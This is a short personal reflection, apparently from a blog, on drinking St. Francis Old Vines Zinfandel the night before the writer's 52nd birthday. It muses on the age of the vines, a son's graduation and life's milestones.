St. Francis Old Vines Zinfandel

“Old Vines.” That’s what the label lauded on the bottle of St. Francis Zinfandel. This classic old world style Zinfandel pays tribute to the legacy of its 50-110-year old vines.

How appropriate, I thought, as a poured a glass of St. Francis Old Vines Zinfandel on the last day of my 51st year. Wine from vines at least as old as I am, harvested in a year I watched my oldest son graduate high school then head off to college.

I didn’t know that before I chose St. Francis on that particular night. It was the day before my birthday, and I had come home from work with the intent to start the celebration with a glass or two of zinfandel. That’s about as wild as a 52-year-old can get on a Thursday night.

I wanted a good wine; I got that and a glass of reflection. 2015 was shaping up to be a pretty good year just as 2012 had been. Another birthday, another graduation to look forward to. Beyond that more celebrations, more opportunities to sit back, sip a zinfandel, and think about all the good things life has brought.

Every year we live has milestones, even if it’s only a celebration of the day of our birth. But beyond that, any given year has graduations, weddings, births of children or grandchildren, vacations, retirements. All events on the timelines of our lives that accumulate year after year like grapes on the vine.
